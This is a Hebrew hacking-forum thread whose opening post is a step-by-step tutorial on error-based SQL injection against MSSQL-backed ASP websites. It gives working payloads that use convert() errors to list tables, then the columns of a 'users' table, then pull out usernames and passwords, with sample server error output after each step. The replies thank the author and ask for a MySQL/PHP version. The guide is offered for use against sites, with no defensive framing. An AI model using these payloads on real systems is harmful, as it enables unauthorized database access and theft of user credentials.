קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [בקשה] שתעשו מדריך SQL INJECTION למסד MSSQL
    על ידי Reggae-Man בפורום האקינג ואבטחת מידע
    תגובות: 13
    הודעה אחרונה: 17-08-2010, 13:16
  2. [מדריך]:איך להפוך את המקשים של הנוקיה לצבעונים, שוו
    על ידי 0neill b0y בפורום ארכיון מדריכים
    תגובות: 11
    הודעה אחרונה: 14-03-2007, 17:59
  3. [מדריך] פתיחת דלת האינטרקום בלי מפתח ובלי אף אחד שיפתח !
    על ידי אוריה בפורום ארכיון מדריכים
    תגובות: 36
    הודעה אחרונה: 29-10-2006, 13:39
  4. מדריך לטיל מים
    על ידי אוריה בפורום ארכיון מדריכים
    תגובות: 6
    הודעה אחרונה: 08-10-2006, 23:48
  5. מדריך: קיצור דרך לכבות תמחשב
    על ידי אוריה בפורום ארכיון מדריכים
    תגובות: 3
    הודעה אחרונה: 16-09-2006, 14:33
+ תגובה לנושא
מציג תוצאות 1 עד 4 מתוך 4

מדריך - הזרקה למסדי MSSQL

  1. #1
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    35
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל מדריך - הזרקה למסדי MSSQL

    הזרקה למסד מסוג MSSQL איך?
    שלום לכולם ,היום אני הולך ללמד אותכם הזרקה למסד מסוג MSSQL.
    יש כמה שיטות.
    כמו having group וכדומה..
    אבל כאן תלמדו שיטה אחרת.
    טוב איך אנחנו יודעים שזה מסוג MSSQL?
    אם נוסיף ' כמו בSQLI זה יתן לנו את השגיאה הזאתי:
    קוד:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14' 
    [Microsoft][ODBC SQL Server Driver][SQL Server] 
    /index.asp, line 56
    על מנת לראות את הטבלה הראשונית נזריק את השאילתה הבאה:
    קוד:
    and 1=convert(int,(select top 1 table_name from information_schema.tables))--
    עכשיו נקבל את השגיאה ההזאת:
    קוד:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'page' to a column of data type int. 
    /index.asp, line 56
    קיבלנו שpage היא הטבלה הראשונית.
    עכשיו איך נמשיך?
    קוד:
    nd 1=convert(int,(select top 1 table_name from  information_schema.tables where table_name not in  ('page')))--
    לאחר מכן תוצג לנו השגיאה הבאה:
    קוד:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting   the nvarchar value 'category' to a column of data type int. 
    /index.asp, line 56
    כעת נעשה כך:
    קוד:
    and 1=convert(int,(select top 1 table_name from  information_schema.tables where table_name not in  ('page','category')))--
    מיפה נמשיך הלאה מכיוון עד שאין כבר טבלאות
    כעת נשלוף את העמודות.
    קוד:
    and 1=convert(int,(select top 1 column_name from  information_schema.columns where table_name='users'))--
    עכשיו תיווצר שגיאה כזאתי:
    קוד:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting   the nvarchar value 'password' to a column of data type int. 
    /index.asp, line 56
    מיכאן מבינים שיש עמודה בשם password.
    עכשיו נמשיך כך:
    and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('password')))--
    עכשיו תתקבל עוד שגיאה עם העמודה username
    קוד:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07' 
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting   the nvarchar value 'username' to a column of data type int. 
    /index.asp, line 56
    עכשיו אם אנחנו רוצים לראות אם יש עוד עמודות נעשה כך
    קוד:
    and 1=convert(int,(select top 1 column_name from   information_schema.columns where table_name='users' and column_name not   in ('password','username')))--
    ומיפה נמשיך הלאה..
    כעת איך אנחנו שולפים?
    קוד:
    and 1=convert(int,(select top 1 password from users))--
    שלפנו את העמודה password מהטבלה users.
    כעת נשלוף username.
    קוד:
    and 1=convert(int,(select top 1 username from users))--
    סופו של המדריך ,בהצלחה לכולם : )




  2. קישורים ממומנים

  3. #2
    משתמש מתקדם
    שם פרטי
    ספיר
    תאריך הצטרפות
    03/2011
    גיל
    30
    הודעות
    532
    לייקים
    26
    נקודות
    -30
    משפט מחץ
    יש שני דברים אינסופים: היקום ואיבר המין שלי אבל אני לא בטוח לגבי הראשון XD
    מין: זכר

    ברירת מחדל

    מוכר...תודה הכ"מ אני יפרסם במיני לינקייה שלי

  4. #3
    משתמש משקיע האוואטר של CSS
    תאריך הצטרפות
    08/2010
    הודעות
    3,206
    לייקים
    176
    נקודות
    1,200
    משפט מחץ
    כי גם מנהלים הם בני אדם..
    מין: זכר

    ברירת מחדל

    תודה,אבל אני אשמח שגם תתן דרך להזרקה MYSQL עם אתרים של PHP.

    המשתמשים שלי:
    HotBanana > NewYear > Dursci > DurSci > FullSex > CSS
    PHP | SQL | HTML | CSS | JS | JQUERY | AJAX

  5. #4
    משתמש מתקדם
    שם פרטי
    חסוי
    תאריך הצטרפות
    10/2010
    הודעות
    885
    לייקים
    22
    נקודות
    -59
    משפט מחץ
    ):
    מין: זכר

    ברירת מחדל

    מדריך מצויין ! ללניקה מיד.

    מנהל אבטחת מידע לשעבר.

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 09:04.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,473,000 | הודעות: 8,173,587 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect